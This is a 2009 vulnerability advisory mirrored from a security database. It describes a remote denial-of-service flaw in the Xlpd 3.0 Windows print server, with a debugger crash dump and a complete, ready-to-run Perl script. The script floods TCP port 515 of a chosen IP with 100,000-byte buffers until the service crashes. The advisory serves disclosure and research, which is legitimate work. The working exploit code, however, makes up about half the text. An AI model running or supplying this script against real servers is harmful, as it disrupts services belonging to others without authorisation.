Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22573
HistoryOct 07, 2009 - 12:00 a.m.

{PRL} XLPD 3.0 Remote DoS

2009-10-0700:00:00
vulners.com
10

#####################################################################################

Application: XLPD 3.0 Remote DoS

Platforms: Windows XP Professional SP2

crash: YES

Exploitation: remote DoS

Date: 2009-10-06

Author: Francis Provencher (Protek Research Lab's)

#####################################################################################

1) Introduction
2) Technical details
3) The Code

#####################################################################################

===============
1) Introduction

Xlpd is an LPD (Line Printer Daemon) application for MS Windows platforms. When applying Xlpd, your
local PC with a printer becomes a print server where the

print jobs from various remote systems are requested and processed in networked environment.

Xlpd helps you print remote files locally without manually downloading them into your local
computer. When you are connected to a remote UNIX/Linux system

with Xmanager or Xshell program and want to print some data of the remote system, just enter print
command on the terminal prompt.

(www.netsarang.com)

#####################################################################################

============================
2) Technical details

Xlpd 3.0
Build 0076
Aug 30, 2009

(774.d80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0012f77c ecx=fffff703 edx=000004fc esi=ffffffff edi=01390000
eip=004031c5 esp=0138f468 ebp=00ff8ce0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206

#####################################################################################

===========
3) The Code

Proof of concept DoS code;

#!/usr/bin/perl

###################################################################################

Software: XLPD 3.0 Remote DoS

Found By: Francis Provencher (Protek Research Lab's)

Tested On: Windows XPSP2

Usage: perl scriptname <Target IP>

###################################################################################

use Getopt::Std;
use Socket;
my $SOCKET = "";

$loop = 51;
$host = $ARGV[0];
$port = 515;

if (!defined $host){
print "Host not defined.\n"
}

$str = "\x41" x 100000;

$iaddr = inet_aton($host) || die "Unknown host: $host\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp') || die "getprotobyname: $!\n";

for ($j=1;$j<$loop;$j++) {

    socket&#40;SOCKET,PF_INET,SOCK_STREAM, $proto&#41; || die &quot;socket: $!&#92;n&quot;;
    connect&#40;SOCKET,$paddr&#41; || die &quot;Lost Conection: $! .........bye bye?&#92;n&quot;;
    send&#40;SOCKET,$str, 0&#41;    || die &quot;failure sent: $!&#92;n&quot;;
    print &quot;&#92;nSending string: &quot;.$j;
    sleep&#40;1&#41;;
    close SOCKET;
    sleep&#40;1&#41;;

}

#####################################################################################
(PRL-2009-10)

  __________________________________________________________________

Looking for the perfect gift? Give the gift of Flickr!

http://www.flickr.com/gift/